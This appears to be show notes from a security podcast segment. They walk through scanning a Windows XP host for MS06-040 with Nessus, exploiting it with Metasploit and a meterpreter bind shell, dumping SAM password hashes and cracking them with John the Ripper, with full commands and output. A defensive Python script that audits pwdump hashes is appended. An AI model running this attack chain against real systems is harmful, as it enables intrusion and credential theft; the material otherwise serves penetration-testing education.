Episode106 – PaulDotCom Security Weekly
Tech Segment: Probe, Exploit, and Crack for Free
On my Linux box (it could be OS X, but I got errors when I ran nessuscmd under OS X; Ron will be emailing me as soon as he listens to the show) I run nessuscmd and tell it to OS fingerprint with -O, print a full report with -V, use plugin ID 22194 (MS06-040), scan TCP ports 139 and 445 with -sS -p139,445, disable safe checks with -U, and test the host:

root@linux-box:~# /opt/nessus/bin/nessuscmd -O -V -i 22194 -v -sS -p139,445 -U
It reports:

Host is up
Discovered open port netbios-ssn (139/tcp) on
Discovered open port microsoft-ds (445/tcp) on
[i] Plugin 11936 reported a result on port general/tcp of
[!] Plugin 22194 reported a result on port microsoft-ds (445/tcp) of

+ Results found on :
- Host information :
[i] Plugin ID 11936
| Remote operating system : Microsoft Windows XP
| Microsoft Windows XP Service Pack 1
| Confidence Level : 99
| Method : MSRPC
| The remote host is running one of these operating systems :
| Microsoft Windows XP
| Microsoft Windows XP Service Pack 1
- Port netbios-ssn (139/tcp) is open
- Port microsoft-ds (445/tcp) is open
[!] Plugin ID 22194
| Synopsis :
| Arbitrary code can be executed on the remote host due to a flaw in the
| 'server' service.
| Description :
| The remote host is vulnerable to a buffer overrun in the 'Server' service
| which may allow an attacker to execute arbitrary code on the remote host
| with the 'System' privileges.
| Solution :
| Microsoft has released a set of patches for Windows 2000, XP and 2003 :
| http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx
| Risk factor :
| Critical / CVSS Base Score : 10.0
| (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
| CVE : CVE-2006-3439
| BID : 19409

Sweet, I love vulnerabilities! They are sexy and exciting, especially MS06-040, because it's just so delicious and begging to be devoured by Metasploit. I have Metasploit 3.1 installed on OS X:
/framework-3.1/trunk gordon$ ./msfconsole
=[ msf v3.2-release
+ -- --=[ 286 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 62 aux

I want to tell Metasploit to use the following module:
msf > use windows/smb/ms06_040_netapi
I want to set my payload to a standard meterpreter bind shell, which will let me inject into processes dynamically:
msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp

I then tell Metasploit what to target:
msf exploit(ms06_040_netapi) > set RHOST
Here is what my options look like:

msf exploit(ms06_040_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options:

   Name      Current Setting                                                Required  Description
   ----      ---------------                                                --------  -----------
   DLL       /Users/gordon/framework-3.1/trunk/data/meterpreter/metsrv.dll  yes       The local path to the DLL to upload
   EXITFUNC  thread                                                         yes       Exit technique: seh, thread, process
   LPORT     4444                                                           yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)

Now I tell Metasploit to execute my exploit with the above options:
msf exploit(ms06_040_netapi) > exploit
[*] Started bind handler
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:[\BROWSER] …
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:[\BROWSER] …
[*] Building the stub data…
[*] Calling the vulnerable function…
[*] Transmitting intermediate stager for over-sized stage…(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (81931 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened ( ->

To access session 1, I use the following command:
msf exploit(ms06_040_netapi) > sessions -i 1
I then tell Meterpreter to load the SAM Juicer module:

meterpreter > use -m Sam

Then I issue the "hashdump" command:

meterpreter > hashdump
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::

So then I copy and paste those results into a file in my other directory, where John the Ripper is installed:

paimei:~/downloads/john- gordon$ cat > hashes.txt
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::

Then I crack the passwords using the stock dictionary that comes with John:
paimei:~/downloads/john- gordon$ ./john hashes.txt
Loaded 9 password hashes with no different salts (NT LM DES [64/64 BS MMX])
COM (Administrator:2)
guesses: 5 time: 0:00:00:02 (3) c/s: 11060K trying: TOUSCEL – TOUSMIR
Session aborted

W00t! Now I have remote SYSTEM access to the target, and a username and password to try on other systems, in less than 5 minutes. Sweet! I also have something that can be easily scripted and automated for testing my internal network and verifying vulnerabilities, all for free!
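The hashdump line above is in pwdump format, and the reason John chewed through it in two seconds is visible in the LM field: its second half is the constant an empty LM half always hashes to, so the password is 7 characters or fewer. The following is an added example, not code from the show or from Metasploit, of a defender-side audit that reads such lines and flags stored LM hashes (NoLMHash not in effect), short passwords and blank passwords; the svc_backup and Guest lines are constructed for the example.

```python
import re

# Well-known constants: an empty 7-char LM half always hashes to EMPTY_LM_HALF
# (LM hashes the two halves separately); EMPTY_NT_HASH is the NT hash of "".
EMPTY_LM_HALF = "aad3b435b51404ee"
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump format as printed by hashdump: user:RID:LM-hash:NT-hash:::
PWDUMP_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32})"
                       r":(?P<nt>[0-9a-f]{32}):::$", re.IGNORECASE)

def audit_pwdump_line(line):
    """Describe what one pwdump line reveals about the account's password."""
    m = PWDUMP_RE.match(line.strip())
    if m is None:
        raise ValueError("not a pwdump line: %r" % line)
    lm, nt = m.group("lm").lower(), m.group("nt").lower()
    lm_stored = lm != EMPTY_LM_HALF * 2
    return {
        "user": m.group("user"),
        "rid": int(m.group("rid")),
        "lm_stored": lm_stored,  # NoLMHash policy is not in effect on this host
        "short_password": lm_stored and lm[16:] == EMPTY_LM_HALF,  # <= 7 chars
        "blank_password": nt == EMPTY_NT_HASH,
    }

def audit_pwdump(text):
    """Audit every non-blank line of a hashdump/pwdump listing."""
    return [audit_pwdump_line(l) for l in text.splitlines() if l.strip()]

def remediation(results):
    """Turn audit results into the findings a defender would act on."""
    notes = []
    if any(r["lm_stored"] for r in results):
        notes.append("LM hashes stored: enable NoLMHash and reset affected passwords")
    for r in results:
        if r["short_password"]:
            notes.append("%s: password is 7 characters or fewer" % r["user"])
        if r["blank_password"]:
            notes.append("%s: blank password" % r["user"])
    return notes

# Sample input: the show's TeamTed line plus two constructed accounts.
SAMPLE = """
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::
svc_backup:1005:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""
for note in remediation(audit_pwdump(SAMPLE)):
    print(note)
```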